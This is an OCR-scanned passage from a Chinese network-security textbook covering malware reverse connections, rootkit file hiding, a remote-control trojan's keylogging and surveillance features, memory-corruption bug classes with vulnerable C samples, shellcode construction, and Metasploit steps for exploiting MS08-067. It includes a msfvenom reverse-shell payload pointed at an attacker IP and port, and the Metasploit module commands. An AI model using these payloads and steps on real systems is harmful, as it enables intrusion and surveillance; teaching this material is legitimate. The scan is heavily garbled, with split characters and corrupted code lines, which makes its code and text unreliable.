连接 恶意 代码 (shell_2) 的 方法 ,shell_2 直接 设置 远程 攻击 者 的 主机 IP 和 端口 分 别 为 
192. 168. 2. 105 和 3000, 使 用 多 态 指令 生成 器 “x86/shikata_ga_nai” 进 行 变换 。 图 5-52 
演示 恶意 代码 shell2 执行 时 反 向 连接 通过 Metasploit 平台 开启 的 3000 端口 , 当 连 接 建立 
时 攻击 者 获得 一 个 远程 命令 窗口 (command shell) ,然后 敲 入 ID 命令 并 得 到 返回 结果 。 

攻击 者 正 向 连接 目标 主机 











Web 服 务 器 1. 连接 指定 域名 的 远 端 Web 服 务 器 


虚线 表示 反 向 连接 过 程 
实 线 表 示 正 向 连接 过 程 


图 5-50 ”端口 反 向 连接 过 程 


®D http://blog. csdn. net/ceabie/article/details/5309131 
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f elf -o shell_1 





图 5-51 生成 正 向 连接 和 反 向 连接 的 恶意 代码 





图 5-52 恶意 代码 反 向 连接 攻击 者 
5. 文件 隐藏 
恶意 代码 的 程序 文件 隐藏 方法 包括 文件 (或 目录 ) 隐 藏 .Rootkits 技术 和 原始 分 发 隐藏 等 。 
简单 的 文件 隐藏 可 以 设置 文件 的 隐藏 属性 或 者 将 文件 名 复 移 为 类 似 的 某 些 系统 文件 
名 ,安全 人 员 通 过 一 般 的 目录 列表 命令 进行 查看 时 ,难以 察觉 它 的 存在 ,复杂 的 隐藏 可 以 





修改 与 文件 操作 有 关 的 程序 如 dir\ls 等 。 还 可 以 故意 将 某 些 硬盘 扇 区 标志 为 坏 区 ,然后 
把 恶意 代码 隐藏 在 这 些 * 坏 区 ”中 。 





Rootkits 技术 指 码 以 内 核 模 块 或 驱动 程序 方式 运行 ,安全 软件 无 法 对 其 进行 
检查 和 清除 ,同时 文件 系统 中 也 没有 任何 该 代码 存在 的 痕迹 ,但 是 当 系统 关机 后 , 它 又 会 
存储 在 硬盘 的 某 个 角落 等 待 下 次 开机 运行 

原始 分 发 隐藏 是 指 恶意 代码 在 正常 应 用 程序 初始 发 布 时 就 植 信 进 应 用 程序 ,例如 使 
用 经 过 修改 的 编译 器 对 正常 的 源 代码 进行 编译 ,生成 的 可 执行 程序 中 就 可 能 携带 代 
码 。 这 种 方式 非常 隐蔽 ,因为 用 户 从 源 代 码 中 无 法 找到 任何 破绽 ,而 通常 用 户 不 会 怀疑 编 
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译 器 有 问题 。 
5.3.3 主要 功能 


恶意 代码 的 功能 一 般 包 括 远程 控制 .进程 控制 、 键 盘 记 录 、 网 络 监 听 、 信 息 窃 取 、 设 备 
控制 等 。 本 节 以 远程 控制 工具 “上 兴 远 程控 制 ?2(2009 版 ) 为 例 说 明 常见 恶意 代码 的 功 
能 。 图 5-53 为 恶意 代码 的 远程 控制 端 , 它 负 责 生 成 在 目标 主机 运行 的 恶意 代码 服务 端 ， 
设置 反 向 连接 方式 为 静态 IP 方式 (可 用 Web 域名 解析 方式 ) ,连接 192. 168. 24. 136 的 
8181 端口 (默认 ) ,隐蔽 方式 采用 注入 notepad. exe 进程 (也 可 注入 其 他 程序 或 IE 浏览 
器 ) ,可 选择 是 否 支持 upx 壳 或 其 他 外 壳 , 并 可 设置 自 克 隆 保护 文件 (类 似 三 线程 方法 )， 
甚至 可 自动 更 新 服务 端 程序 ,连接 口令 用 于 控制 端的 认证 过 程 。 


加 mn em ov 更 








图 5-53 服务 端 配 置 


当 服 务 端 程序 在 目标 主机 执行 后 ,在 任务 管理 器 中 看 到 运行 了 “notepad. exe”, 即 为 
服务 端 注入 的 进程 , 它 反 向 连接 控制 端 程序 ,可 以 看 到 图 5-54 中 有 主机 上 线 , 而 且 可 以 浏 
览 和 管理 它 的 文件 系统 ,观察 和 管理 它 的 运行 进程 列表 ; 图 5-55 中 显示 控制 端 可 以 启动 
远程 命令 行 shell、 音 视频 监控 ,键盘 记录 、 内 存 监控 和 网 络 监控 等 功能 。 
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5-54 ”服务 端 运行 后 的 显示 画面 及 进程 管理 功能 


@ http://98exe. com, 与 灰 位 子 木马 类 似 的 工具 。 
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图 5-55 ”远程 控制 .视频 监控 ,键盘 网络 .内存 监视 


5.4 漏洞 破解 


漏洞 是 在 硬件 .软件 ,协议 的 具体 实现 或 系统 安全 策略 上 存在 的 缺陷 ,从 而 可 以 使 攻 
击 者 能 够 在 未 授权 的 情况 下 访问 或 破坏 系统 ,包括 操作 系统 漏洞 .应 用 程序 漏洞 和 系统 配 


5.4.1 漏洞 分 类 


基于 漏洞 破解 的 位 置 对 其 进行 分 类 ,可 分 为 本 地 漏洞 和 远程 漏洞 。 本 地 漏洞 指 需要 
操作 系统 的 有 效 账 号 登录 到 本 地 才能 破解 的 漏洞 ,主要 是 权限 提升 类 漏洞 , 即 把 自身 的 执 
行 权限 从 普通 用 户 级 别提 升 到 管理 员 级 别 。 远 程 漏洞 指 无 须 操作 系统 账号 的 验证 即 可 通 
过 网 络 访问 目标 进行 漏洞 破解 ,如 果 漏 洞 仅 需要 诸如 FTP 用 户 账号 即 可 破解 ,该 漏洞 属 
于 远程 漏洞 。 

基于 漏洞 威胁 类 型 对 其 进行 分 类 ,可 分 为 非法 访问 漏洞 .信息 泄露 漏洞 和 拒绝 服务 漏 
洞 。 非 法 访问 漏洞 可 以 导致 程序 执行 流程 被 劫持 ,转向 执行 攻击 者 指定 的 任意 指令 或 命 
令 , 从 而 进一步 控制 应 用 系统 或 操作 系统 。 此 类 漏洞 威胁 最 大 ,同时 破坏 了 系统 的 机 密 
性 、 完 整 性 .甚至 可 用 性 。 信 息 泄 露 漏洞 可 以 导致 劫持 程序 访问 非 授权 的 资源 并 泄露 给 攻 
击 者 ,破坏 系统 的 机 密 性 。 拒 绝 服务 漏洞 可 以 导致 目标 应 用 或 系统 暂时 或 永远 性 地 失去 
响应 正常 服务 的 能 力 ,破坏 系统 的 可 用 性 。 

基于 漏洞 形成 的 技术 对 其 进行 分 类 ,可 分 为 内 存 破坏 漏洞 .逻辑 错误 漏洞 、. 输 入 验证 
漏洞 .设计 错误 漏洞 和 配置 错误 漏洞 等 。 

内 存 破 坏 漏 洞 指 由 于 程序 存在 某 种 形式 的 非 授权 内 存 越 界 访问 ,导致 执行 攻击 者 指 
定 的 任意 指令 ,或 者 导致 拒绝 服务 或 信息 泄露 。 对 它 进 一 步 细 分 漏洞 来 源 , 可 分 出 如 下 子 

1. 栈 缓冲 区 溢出 

人 指 发 生 在 堆栈 中 的 缓冲 区 溢出 ,大 
多 可 以 导致 执行 任意 指令 

缓冲 区 溢出 指 向 家 态 或 动态 分 配 的 连续 内 存 中 写 教 据 时 ， 写 入 的 数据 长 度 超出 分 配 
内 存 的 大 小 。 例 如 程序 定义 了 10 个 元 素 的 整 型 数组 *int buff[10]”, 那 么 只 有 buff[o] 一 
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buff[9] 的 空间 是 合法 空间 ,但 后 来 程序 向 数组 连续 写 入 数据 时 出 现 了 类 似 “buff[12]= 
0x10” 之 类 的 语句 , 则 访问 了 非 授权 内 存 , 访 问 超出 了 数组 范围 , 即 缓冲 区 溢出 。C 语言 常 
用 的 strepy、sprintf、strcat 等 函数 都 非常 容易 导致 缓冲 区 溢出 问题 ,通常 C 语言 的 书籍 和 
规范 会 指出 溢出 后 会 可 能 发 生 不 可 预料 的 结果 ,但 是 在 网 络 安全 领域 ,缓冲 区 溢出 利用 的 
艺术 在 于 让 这 个 “不 可 预料 的 结果 ” 变 为 攻击 者 期 望 的 结果 。 
5-56 给 出 了 一 个 32 位 Linux 操作 系统 中 的 程序 内 存 布局 。 通 常 , 堆 栈 是 一 个 后 
进 先 出 的 数据 结构 ,向 低地 址 增长 ,用 于 保存 局 部 变量 和 函数 调用 等 信息 。 每 调用 一 次 函 
数 ,函数 的 栈 帧 向 内 存 低地 址 方向 延伸 分 配 ,每 次 从 函数 调用 返回 时 ,函数 的 栈 帧 会 被 释 
放 ,堆栈 向 内 存 的 高 地 址 方向 收缩 。 每 个 函数 的 栈 帧 大 小 与 函数 定义 有 关 。 函 数 调用 时 
所 建立 的 栈 帧 ,从 高 地 址 到 低地 址 顺序 ,包含 如 下 信息 : 
(1) 为 被 调用 函数 的 参数 分 配 的 空间 ; 
(2) 存储 被 调用 函数 的 返回 地 址 ; 
(3) 存储 当前 调用 函数 的 栈 帧 指针 ; 
(4) 为 被 调用 函数 的 局 部 变量 分 配 的 空间 。 
由 于 函数 里 局 部 变量 的 内 存 分 配 发 生 在 栈 帧 
中 ,如 果 某 个 函数 定义 数组 变量 , 则 这 个 变量 所 占用 
的 内 存 空间 是 在 该 函数 被 调用 时 所 建立 的 栈 帧 中 。 
对 该 变量 的 潜在 操作 (如 字符 串 复制 ) 都 是 从 低地 址 
到 高 地 址 进行 ,而 内 存 中 保留 的 函数 返回 地 址 就 在 
该 缓冲 区 的 上 方 (高 地 址 ) ,攻击 者 就 可 以 利用 这 些 
操作 覆盖 函数 的 返回 地 址 。 当 攻击 者 有 机 会 利用 超 
出 目标 缓冲 区 大 小 的 内 容 向 缓冲 区 进行 写 操作 时 ， 
就 可 以 修改 保存 在 函数 栈 帧 中 的 返回 地 址 ,从 而 使 
程序 的 执行 流程 接受 攻击 者 的 控制 。 示 例 代码 。 图 5.58 32 位 Linux 操作 系统 的 
如 下 : 程序 内 存 布局 
#include< stdio.h> 
void why_here(void) /* 这 个 函数 没有 任何 地 方 调用 过 * / { 
printf("why u here ?1\n"); 
exit(0); 
} 
int main(int argc, char * argv[]) { 
int buff[1]; 
int i; 
for (i = 0;i<= 2;i++) // 没 有 比较 循环 次 数 和 buff 的 元 素 个 数 
buff[i] = (int)why_here; 
return 0; 


} 


执行 该 程序 并 仔细 分 析 打印 信息 ,会 发 现 程序 中 没有 调用 过 why_here 函数 ,但 该 
函数 却 在 运行 时 被 调用 了 。 这 里 唯一 的 解释 是 “buff[i 二 why_here” 语 句 导 致 了 程序 执 
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行 流程 的 变化 。 当 程序 执行 进入 main 函数 后 ,堆栈 内 容 从 高 地 址 到 低地 址 存储 的 是 
“[eipjLebpj[Lbuff[0]j[iJ”, 其 中 eip 为 main 函数 的 返回 地 址 ,buffLo] 是 buff 申明 的 一 个 
元 素 的 整 型 空间 ,只 有 对 buff[0] 的 操作 是 合法 操作 ,而 在 循环 中 对 buff[2] 也 进行 了 赋 
值 ,语句 “buff[2] 二 why_here” 超 出 了 buff 的 合法 空间 ,该 溢出 的 后 果 是 覆盖 了 栈 中 eip 
存放 单元 的 数据 ,将 main 函数 的 返回 地 址 改 成 why_here 函数 的 入 口 地 址 。 当 main 函 
数 结束 并 返回 时 ,将 why_here 的 函数 地 址 作为 返回 地 址 并 运行 。 
上 述 程 序 的 问题 在 于 没有 对 循环 的 次 数 与 数组 的 长 度 进行 对 比 检查 ,有 的 程序 是 在 
复制 数据 时 没有 对 参数 的 长 度 进行 检查 ,导致 缓冲 区 溢出 。 示 例 代码 如 下 : 
void stackover(char * ptr) { 
char buffer[8]; 
strcpy(buffer, ptr); // 未 检查 ptr 的 内 容 长 度 
printf("string= % s\n", buffer); 
} 
攻击 者 可 以 送 入 一 个 超过 8 字 节 的 ptr 指针 ,使 得 修改 stackover 函数 的 返回 地 址 ， 
导致 执行 流程 发 生变 化 。 
还 有 一 种 溢出 称 为 整数 溢出 (Integer Overflow) ,主要 是 没有 考虑 不 同 整数 类 型 在 内 
存 中 所 占 字 节 数 不 同 ,示例 代码 如 下 : 


void stackover(char * ptr){ 


short a; // 内 存 中 分 配 两 个 字 节 
Char *# pa; 

pa = (char* )g&a; 

memcpy(pa, ptr, 4); // 复 制 了 4 个 字 节 


上 述 代码 中 局 部 变量 a 是 短 整 数 类 型 ,只 在 内 存 中 占 两 个 字 节 ,指针 pa 指向 a 的 内 
存 位 置 ,memcpy 函数 向 其 复制 了 4 个 字 节 的 内 容 , 超 出 了 合法 分 配 的 内 存 空间 ,因此 存 
在 安全 隐患 。 
2. 堆 缓冲 区 溢出 
导致 堆 溢 出 的 来 源 与 栈 溢出 相同 ,都 是 因为 参数 长 度 检 查 不 充分 的 数据 操作 ,唯一 不 
同 的 地 方 只 是 出 现 问题 的 对 象 不 是 在 编译 阶段 就 已 经 确定 分 配 的 栈 缓冲 区 ,而 是 随 着 程 
序 执行 动态 分 配 的 堆 块 。 示 例 代码 如 下 : 
void heapover(char x ptr){ 
char * buffer= (char* )malloc(10); // 分 配 10 字 节 的 内 存 空 间 
strcpy(buffer, ptr); // 未 检查 ptr 的 内 容 长 度 
printf("string= % s\n", buffer); 
} 


3. 静态 数据 区 溢出 
发 生 在 静态 数据 区 BSS 段 中 的 溢出 ,属于 非常 少见 的 溢出 类 型 。 示 例如 下 : 


char buffer[256]; // 全 局 未 初始 变量 ,静态 分 配 256 字 节 的 内 存 空 间 
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void bssover(char * ptr){ 
strcpy(buffer, ptr); // 未 检查 ptr 的 内 容 长 度 
printf("string= % s\n", buffer); 

} 


4. 格式 串 问题 了 

在 打印 类 ( x printf) 函数 中 没有 正确 使 用 格式 串 参数 ,使 攻击 者 可 以 控制 格式 串 的 内 
容 , 操 纵 该 函数 调用 越界 访问 非 授权 内 存 。printf 函数 的 第 一 个 参数 是 格式 化 字符 串 , 在 
C 程序 中 有 许多 用 来 格式 化 字符 串 的 说 明 符 ,它们 的 前 组 总 是 “%% ?字符 ,常见 格式 包括 ， 

(1) %d: 输出 十 进 制 整数 ; 

(2) %s: 输出 字符 串 ; 

(3) %x: 输出 十 六 进 制 数 ; 

(4) %c: 输出 字符 ; 

(5) %p: 输出 指针 地 址 ; 

(6) %n: 存储 到 目前 为 止 所 写 的 字符 数 。 

还 有 一 个 较为 少见 的 说 明 符 “ $ ”, 人 允许 我 们 从 格式 化 字符 串 中 选取 一 个 作为 特定 的 
参数 ,如 "%3$s" 表 示 输 出 第 三 个 参数 为 字符 串 , 例 如 语句 printf("%3 $s","a","b"， 
"ec","d") 将 输出 "c" ,而 printf("%3$n"&a&b,&c) 将 数值 0 赋予 变量 c。 如 果 printf 
调用 时 没有 设置 足够 的 实际 参数 , 它 会 把 堆栈 上 的 值 当 作 参 数 ,此 时 攻击 者 就 有 可 乘 之 
机 。 下 列 示例 语句 使 得 攻击 者 可 以 修改 内 存 中 的 数据 ,分 别 写 入 4 和 ?7 到 当前 堆栈 顶部 
两 处 内 存 所 指向 的 空间 ,因为 这 两 处 内 存 被 当成 printf 的 参数 变量 所 在 的 位 置 : 


printf("AAAA % nAAA % n\n"); 


5. 释放 后 重用 
这 是 目前 最 主流 最 具 威 胁 的 客户 端 (特别 是 浏览 器 ) 漏 洞 类 型 ,此 类 漏洞 大 多 来 源 于 
对 象 的 引用 计数 操作 不 平衡 ,导致 对 象 被 释放 后 又 重新 使 用 ,进程 在 后 续 操作 那些 已 经 被 
释放 的 对 象 时 执行 攻击 者 的 指令 。 与 上 述 几 类 漏洞 的 不 同 之 处 在 于 ,此 类 漏洞 的 触发 基 
于 对 象 的 操作 异常 ,而 非 基 于 数据 的 长 度 异 常 。 下 列 示例 代码 中 变量 a 在 free 调用 后 ,由 
于 没有 被 重新 置 为 NULL, 被 后 续 的 memcpy 函数 写 入 : 
void main(){ 
char b[100]; 
char * a = (char* )malloc(100); 
if (a != NULL) 
free(a); // 已 经 释放 


if (a!= NULL) 
memcpy(a, b, 100); // 写 人 已 经 被 释放 的 空间 


加 ”http://www. freebuf. com/articles/system/74224. html。 
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6. 二 次 释放 

二 次 释放 来 源 于 代码 中 涉及 内 存 使 用 和 释放 的 操作 旭 辑 ,导致 同一 个 堆 缓冲 区 可 能 
被 反复 地 释放 ,最 终 导 致 的 后 果 与 操作 系统 堆 管理 的 实现 方式 相关 ,很 可 能 实现 执行 任意 
指令 。 下 列 示例 代码 中 ,变量 a 没有 被 置 为 NULL, 导 致 每 次 循环 它 都 会 被 释放 : 

void main(){ 


char * a = (char* )malloc(100); 


for (int i = 0;i<10;i++){ 


if (a != NULL) 
free(a); // 重 复 释 放 


逻辑 错误 漏洞 指 安 全 检查 的 实现 逻辑 存在 问题 ,导致 设计 的 安全 机 制 被 绕 过 。 下 列 
示例 代码 是 “Google Play” 用 于 验证 客户 是 否 已 经 付费 的 代码 片段 ,但 是 验证 代码 存在 好 
辑 问题 ,导致 攻击 者 可 以 绕 过 验证 不 用 真 的 付费 就 能 买 到 东西 。 

它 首先 检查 参数 的 数据 签名 是 否 为 空 ,签名 不 为 空 则 检查 签名 是 否 正确 ,如 果 不 正 确 
则 返回 失败 。 问 题 在 于 如 果 签 名 为 空 , 代 码 中 并 没有 对 应 的 else 逮 辑 分 支 来 处 理 ,导致 
直接 执行 最 下 面 的 return true 操作 ,结果 是 只 要 参数 的 签名 为 空 就 会 验证 通过 。 


public static boolean verifyPurchase ( String base64PublicKey，String signedData, String 
signature){ 
if (signedData == null) { 
log. e(TAG, "data is null"); 
return false; 
} 
boolean verified = false; 
if (!TextUtils. isEmpty(signature)) { 
PublicKey key = Security. generatePublicKey(base64PublicKey); 
verified = Security. verify(key, signedData, signature); 
if (!verified) { 
log. w(TAG, "signature does not match data. "); 
return false; 
} 
} 
return true; 


} 

输入 验证 漏洞 因为 对 用 户 输入 没有 进行 充分 地 检查 验证 就 用 于 后 续 操 作 ,主要 出 现 
在 Web 应 用 程序 中 ,导致 的 后 果 包 括 SQL 注入 、 跨 站 脚本 执行 .远程 或 本 地 文件 包含 、 命 
令 注 入 ,目录 遍历 等 ( 见 13. 1 节 )。 

设计 错误 漏洞 指 系统 在 初始 设计 时 对 安全 机 制 考 虑 不 充分 ,导致 在 设计 阶段 就 已 经 
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引入 的 安全 漏洞 。 例 如 微软 公司 早期 的 Windows 账号 加 密 算法 LM Hash 存在 设计 
缺陷 : 

对 于 明文 口令 “Welcome”, 它 首先 将 明文 口令 全 部 转换 为 大 写字 母 “WELCOME” 对 
应 的 二 进 制 串 “57454C434F4D4500000000000000” ,口令 不 足 14 个 字 节 则 补 齐 “0x00”; 
然后 将 口令 切割 成 两 组 7 字 节 数据 ,使 用 固定 算法 (str_to_key) 产 生 对 应 这 两 组 数据 的 8 
字 节 加 密 密 钥 “56A25288347A348A” 和 “00000000000000”; 接着 用 这 两 组 密 钥 对 固定 字 
符 串 “KGS! @# $%” 进 行 标准 DES 加 密 , 生 成 密 文 “C23413A8A1E7665F” 和 
“AAD3B435B51404EE”; 最 后 将 两 组 密 文 拼接 产生 口令 的 LM 哈 希 值 。 

该 算法 的 下 列 弱点 导致 攻击 者 得 到 口令 哈 硕 值 后 可 以 非常 容易 地 暴力 猜测 出 对 应 的 
明文 口令 : 

(1) 口令 转换 为 大 写 极 大 地 缩小 了 密 钥 空间 。 

(2) 两 组 数据 分 别 独立 加 密 , 暴 力 破 解 时 可 以 完全 独立 并 行 。 

(3) 不 足 7 字 节 的 口令 加 密 后 得 到 的 结果 后 半 部 分 都 是 相同 的 固定 串 , 由 此 很 容易 
判定 口令 长 度 。 

配置 错误 漏洞 指 系 统 运 维 过 程 中 不 安全 的 配置 状态 ,导致 攻击 者 可 以 轻易 地 实施 攻 
击 , 例 如 防火 墙 未 开启 或 者 配置 符合 安全 策略 、 反 病毒 软件 未 更 新 、 未 及 时 更 新 系统 补丁 、 
未 开启 系统 的 安全 设置 等 。 


5.4.2 破解 原理 


无 论 系统 存在 何 种 漏洞 ,攻击 者 都 可 以 通过 漏洞 扫描 ( 见 4. 3 节 ) 方 法 远程 发 现 ,然后 
利用 破解 工具 或 破解 程序 ( 称 为 Exploit) 利 用 该 漏洞 实施 攻击 。 本 节 以 栈 缓冲 区 溢出 为 
例 , 说 明 编 写 Exploit 并 完成 远程 攻击 的 基本 原理 。 攻 击 者 发 起 攻击 的 目的 通常 是 为 了 
获得 系统 访问 权限 ,编写 Exploit 最 重要 的 是 将 可 修改 的 地 址 指向 一 段 预先 构造 好 的 代 
码 , 常 称 为 shellcode。 当 shellcode 运行 后 ,可 以 得 到 具有 一 定 访问 权限 的 远程 访问 的 命 
令 行 界面 (shell) 。 如 果 存 在 漏洞 的 程序 是 以 管理 员 身 份 运行 ,那么 攻击 者 获得 的 命令 行 
界面 也 同样 拥有 管理 员 权限 ,从 而 可 以 控制 远程 系统 。 

破解 程序 的 关键 在 于 控制 溢出 后 的 行为 ,也 就 是 shellcode 的 功能 。 它 其 实 就 是 一 段 
机 器 码 , 由 于 最 初 shellcode 的 功能 只 是 获得 一 个 基本 的 “sh shell”, 所 以 被 称 为 
shellcode。 下 面 的 代码 示例 解释 了 什么 是 shellcode。 

左边 的 C 代码 首先 将 add 函数 对 应 的 机 器 码 从 代码 空间 复制 到 缓冲 区 buff, 在 复制 
过 程 中 顺便 打印 出 来 ,然后 通过 函数 指针 pf 运行 复制 至 buff 中 的 代码 。 语 句 “unsigned 
char * ps 一 (unsigned char * ) &add” 让 ps 指向 add 函数 的 起 始 地 址 ,语句 “PF pf 一 
(PF)buff” 让 pf 函数 指针 指向 buff 缓冲 区 ,这样 调 用 pf 函数 指针 时 会 把 buff 中 的 数据 
当 作 机 器 码 执行 ,语句 “x* pd 二 * ps” 把 add 函数 的 机 器 码 从 add 函数 开始 的 地 方 逐个 
字 节 复制 至 buff 数组 , “if( x ps 三 一 0xc3) break” 指 遇 到 ret 指令 (对 应 的 机 器 码 为 
0xc3) 表 示 已 经 复制 到 函数 结尾 .应 该 停止 复制 退出 循环 。 最 后 ,语句 “result 二 pf(129， 
127)” 表 示 调 用 pf, 把 buff 中 的 数据 作为 代码 执行 ,从 而 等 价 于 执行 了 add 函数 。 
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typedef int (* PF)(int, int); 


int main(void){ 


unsigned char buff[256]; 
unsigned char * ps= (unsigned char * )&add; /* ps 指向 add 函数 的 开始 地 址 * / 
unsigned char * pd= buff; 
int result = 0; 
PF pf = (PF)buff; 
while(1) { 
* pd = x ps; // 逐 字 节 复制 
printf("\x% 02x", * ps); 
if (x*ps== 0xc3) 
break; 
Pd++, pst+; 
} 
result = pf(129,127); /* 此 时 的 pf 指向 buff, 执行 add 函数 */ 
printf("\nresult = % i\n", result); 
return 0; 





int add (int x, int Y){ 
return x+y; 











将 该 段 代码 示例 编译 并 执行 后 ,结果 输出 : 

shell:\x55\x89\xe5\x8b\x45\x0c\x03\x45\x08\x5d\xc3 

result = 256 

打印 出 的 结果 实际 上 就 是 add 函数 的 机 器 码 , 也 可 以 称 作 一 段 shellcode, 这 段 代码 
可 以 移植 到 其 他 程序 作为 一 个 函数 使 用 ,如 下 面 的 示例 代码 : 


typedef int (* PF)(int, int); 
int main(void){ 


//shellcode 放 在 缓冲 区 中 


i 


unsigned char buff[ ] = "\x55\x89\xe5\x8b\x45\x0c\x03\x45\x08\x5d\xc3"; 
PF pf = (PF)buff; // 函 数 指针 指向 shellcode 所 在 位 置 

int result = 0; 

result = pf(129,127); // 执 行 shellcode 

printf("result = % i\n", result); 

return 0; 


因此 Exploit 是 否 能 够 成 功 取决 于 shellcode 的 设计 是 否 合理 。 通 常 shellcode 包括 
三 部 分 ,分 别 是 攻击 载荷 (Payload) ,填充 数据 (Nopsledge) 和 返回 地 址 (Return Address， 
RA) ,其 中 RA 用 于 覆盖 可 利用 的 内 存 地 址 ,如 函数 返回 地 址 、 函 数 指针 等 ,将 程序 执行 流 
程 跳 转 到 Payload 处 继续 执行 ; 而 Nopsledge 是 一 段 垃圾 指令 ,用 于 填充 ,无 任何 实际 用 
途 。 一 份 典型 shellcode 的 代码 结构 如 图 5-57 所 示 。 

由 于 很 难 准确 估计 出 Payload 在 堆栈 中 的 具体 位 置 .为 了 提高 命中 率 ,往往 需要 在 
Payload 的 前 面 安排 一 段 Nopsledge 用 于 占 位 ,只 要 RA 指向 Nopsledge 中 的 任何 一 个 位 
置 , 即 可 确保 Payload 会 被 执行 。 在 Intel IA32 指令 集中 有 50 多 条 单字 节 指 令 可 以 实现 
填充 操作 ,如 空 操作 指令 NOP .调整 计算 结果 的 AAS 操作 标志 位 的 CLC 和 CLD 等 ,也 
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图 5-57 ” 栈 缓 冲 区 溢出 的 shellcode 典型 代码 结构 


可 以 使 用 多 字 节 指令 ,只 要 保证 RA 指向 4 字 节 对 齐 的 地 址 即 可 。 

针对 不 同 的 操作 系统 和 不 同 的 应 用 程序 ,由 于 无 法 精确 定位 哪个 具体 地 址 是 可 利用 
的 内 存 地 址 ,因此 为 了 提高 覆盖 的 成 功率 ,通常 在 shellcode 中 连续 写 和 一段 相同 的 RA， 
只 要 其 中 一 个 RA 覆盖 了 相应 的 内 存 地 址 , 则 可 保证 程序 会 跳 转 至 RA 指向 的 内 存 地 址 
继续 执行 。 

Payload 可 以 是 攻击 者 自己 全 新 编写 的 机 器 码 , 也 可 以 充分 利用 系统 库 中 已 经 存在 
的 代码 ,例如 攻击 代码 要 求 执行 “exec“/bin/sh””, 而 在 C 语言 库 中 已 经 有 “exec(arg)” 指 
令 ,那么 只 要 把 传人 的 参数 指针 指向 字符 串 */bin/sh”, 然 后 再 跳 转 到 库 中 的 相应 指令 序 
列 即 可 。 在 Paylaod 中 通常 没有 “0x00” 字 节 , 因 为 它 表 示 了 一 个 字符 串 的 结束 ,而 缓冲 区 
溢出 需要 复制 大 量 字符 ,该 字 节 会 终止 复制 ,导致 shellcode 无 法 完整 复制 。 

缓冲 区 溢出 是 目前 最 常见 的 漏洞 ,对 于 此 类 攻击 的 防范 主要 有 以 下 几 类 方法 : 

(1) 设置 堆栈 不 可 执行 (Data Execution Protection) ,可 以 阻挡 绝 大 部 分 缓冲 区 溢出 。 

(2) 设置 编译 时 的 边界 检查 ,使 缓冲 区 不 出 现 溢出 。 

(3) 执行 动态 或 者 静态 程序 分 析 挖 掘 程序 漏洞 。 


5.4.3 实施 攻击 


具有 较 高 编程 水 平 的 攻击 者 可 以 自行 编写 相应 漏洞 的 全 新 Exploit 并 展开 对 目标 的 
远程 攻击 ,大 部 分 攻击 者 通常 基于 已 有 的 开发 工具 或 者 平台 ,采用 类 似 搭 积木 的 方式 编写 
Exploit 或 者 直接 利用 已 经 存在 的 Exploit 对 目标 发 起 攻击 。 

Metasploit 是 目前 最 具 代表 性 的 攻击 平台 ,其 拥有 强大 的 功能 和 扩展 模块 ,支持 生成 
多 态 payload(msfvenom, 见 5.3.1 节 和 5.3.2 节 )。 它 的 开源 性 使 得 攻击 者 可 以 自由 进 
行 二 次 开发 ,使 用 Ruby 语言 编写 Exploit, 然 后 调用 它 提供 的 各 种 组 件 , 即 可 实现 自动 化 
攻击 。 它 集成 了 不 少 端口 扫描 和 漏洞 扫描 工具 ,同时 集成 了 上 千 种 已 知 漏洞 的 exploit， 
使 得 攻击 者 可 以 轻易 地 实施 远程 攻击 。 

其 基本 架构 如 图 5-58 所 示 ,各 模块 的 基本 功能 描述 参见 表 5-2。 下 面 以 最 常用 的 控 
制 台 用 户 界面 方式 (Console) 介 绍 如 何 使 用 Metasploit 实现 对 特定 漏洞 的 远程 攻击 。 它 
拥有 强大 的 命令 集合 ,可 以 通过 在 控制 台中 直接 输入 “help” 命 令 查 看 支持 的 核心 命令 集 
和 后 端 数 据 库 命 令 集 ,常用 命令 及 含义 如 表 5-3 所 列 。 
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INTERFACES 
Console 
CLI 
MSF 
Core Web 
PLUGINS E Gul 
MODULES 
Payloads Exploits Encoders Nops 
图 5-58 Metasploit 体系 结构 
表 5-2 Metasploit 平台 各 模块 基本 功能 
模 块 功 能 模 块 功 能 
5 集成 了 各 种 实用 工具 ,多 数 为 收集 | CLI 命令 行 界 面 
~ 的 其 他 软件 GUI 图 形 用 户 界面 
PLUGINS 集成 的 其 他 软件 作为 插件 ,但 只 能 | Console 控制 台 用 户 界面 
”” ”| 在 Console 模式 下 工作 Web 网 页 界面 ,目前 已 不 再 支持 
包括 Payload、 Exploit、 Encoders、 Ee 破解 程序 集合 ,不 含 Payload 的 话 
MODULES Nops 和 Aux 等 Exploits = 
a 提供 基本 的 API 和 框架 ,负责 将 各 Be 针对 各 种 操作 系统 、 功 能 各 异 的 攻 
个 子 系统 集成 在 一 起 击 载荷 
Ne 提供 扩展 和 易 用 的 API 以 供 外 部 | Nops 各 种 填充 指令 模块 
| 调用 Aux 各 种 攻击 辅助 程序 
包含 各 种 库 , 是 类 、 方 法 和 模块 的 | Encoders 各 种 多 态 变换 引擎 
Rex 集合 
表 5-3 常用 命令 的 基本 含义 
命 令 基本 含义 命 令 基本 含义 
根据 名 字模 糊 搜索 平台 集成 的 各 | help / ? 列 出 可 用 命令 列表 
3 种 模块 cd 切换 当前 工作 目录 
use 根据 指定 名 字 利 用 某 个 具体 模块 reload 重新 装载 模块 
show options| 查看 模块 的 参数 选项 信息 save 保存 当前 设置 
info 显示 模块 的 具体 信息 makerc 把 键入 的 全 部 命令 保存 为 资源 文件 
set 设置 模块 的 各 种 参数 值 装载 并 执行 某 个 资源 文件 中 的 全 
resource r 
back 从 模块 中 返回 “| 部 命令 
exit 退出 系统 setg 设置 某 个 全 局 变量 的 值 
db_nmap 调用 系统 集成 的 Nmap 模块 version 显示 当前 的 程序 版 本 
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以 下 示例 假设 已 经 使 用 OpenVAS 漏洞 扫描 工具 对 目标 Windows XP 主机 
“192. 168. 1. 103” 进 行 扫描 并 发 现 一 个 RPC 远程 漏洞 ,微软 提供 的 漏洞 编号 是 MS08-067, 攻 
击 者 可 以 利用 该 漏洞 控制 远程 主机 。 利 用 Metasploit 进行 远程 破解 的 主要 步骤 如 下 : 

(1) 搜索 MS08-067 的 Exploits 模块 ,在 控制 台 键 入 "search ms08-067”( 图 5-59 ) 。 


pi 


2008- 10- 28 
orruption 





图 5-59 搜索 具体 模块 名 


(2) 使 用 相应 的 破解 程序 ,键入 “use exploit/windows/smb/ms08_067_netapi”0。 

(3) 查看 利用 该 破解 程序 所 需 参 数 选 项 , 键 人 “show options”( 图 5-60),“Required” 
为 yes 的 选项 是 必须 设置 的 参数 。 示 例 中 需要 设置 目标 地 址 (RHOST)、 目 标 端口 
(RPORT) 和 SMB 的 管道 名 (SMBPIPE)。 





